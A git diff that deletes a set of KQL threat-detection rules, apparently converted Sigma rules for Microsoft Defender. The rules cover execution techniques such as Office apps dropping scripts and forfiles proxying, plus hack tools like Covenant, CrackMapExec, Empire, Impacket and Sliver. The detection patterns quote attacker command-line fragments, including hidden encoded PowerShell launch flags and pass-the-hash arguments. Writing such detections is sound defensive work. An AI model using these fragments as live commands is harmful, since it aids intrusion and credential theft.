-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the creation of files with an executable or script extension by an Office application.
-// Tags: attack.t1204.002, attack.execution
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not(((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/Execution/Forfiles_Command_Execution.kql b/Execution/Forfiles_Command_Execution.kql
deleted file mode 100644
index 1805c4a9..00000000
--- a/Execution/Forfiles_Command_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022/06/14
-// Level: medium
-// Description: Detects the execution of "forfiles" with the "/c" flag.
-While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
-Can be used to bypass application whitelisting.
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql b/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
deleted file mode 100644
index 5a0c3e9b..00000000
--- a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/03/02
-// Level: medium
-// Description: A symbolic link is a type of file that contains a reference to another file.
-This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql b/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
deleted file mode 100644
index 030862ee..00000000
--- a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: high
-// Description: Detects any GAC DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql b/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution.kql b/Execution/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql b/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
deleted file mode 100644
index 9f4071c7..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: Detects various execution patterns of the CrackMapExec pentesting framework
-// Tags: attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql b/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
deleted file mode 100644
index b509eb86..00000000
--- a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/04/20
-// Level: high
-// Description: Detects suspicious powershell command line parameters used in Empire
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/Execution/HackTool_-_Impacket_Tools_Execution.kql b/Execution/HackTool_-_Impacket_Tools_Execution.kql
deleted file mode 100644
index dd80528d..00000000
--- a/Execution/HackTool_-_Impacket_Tools_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: high
-// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql b/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
deleted file mode 100644
index 9f71a8e1..00000000
--- a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/24
-// Level: medium
-// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Koadic_Execution.kql b/Execution/HackTool_-_Koadic_Execution.kql
deleted file mode 100644
index 48fb0d16..00000000
--- a/Execution/HackTool_-_Koadic_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: wagga, Jonhnathan Ribeiro, oscd.community
-// Date: 2020/01/12
-// Level: high
-// Description: Detects command line parameters used by Koadic hack tool
-// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql b/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
deleted file mode 100644
index 222c3f7c..00000000
--- a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/08/25
-// Level: critical
-// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Stracciatella_Execution.kql b/Execution/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Execution/HackTool_-_Stracciatella_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_WinPwn_Execution.kql b/Execution/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Execution/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 2a00e9b4..00000000
--- a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql b/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
deleted file mode 100644
index e96c12e8..00000000
--- a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/06
-// Level: medium
-// Description: Detects events that appear when a user click on a link file with a powershell command in it
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql b/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
deleted file mode 100644
index a95b8202..00000000
--- a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/10
-// Level: medium
-// Description: Detects powershell scripts that import modules from suspicious directories
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Execution/Insecure_Transfer_Via_Curl.EXE.kql b/Execution/Insecure_Transfer_Via_Curl.EXE.kql
deleted file mode 100644
index c4a97253..00000000
--- a/Execution/Insecure_Transfer_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "--insecure" flag.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql b/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql b/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql b/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
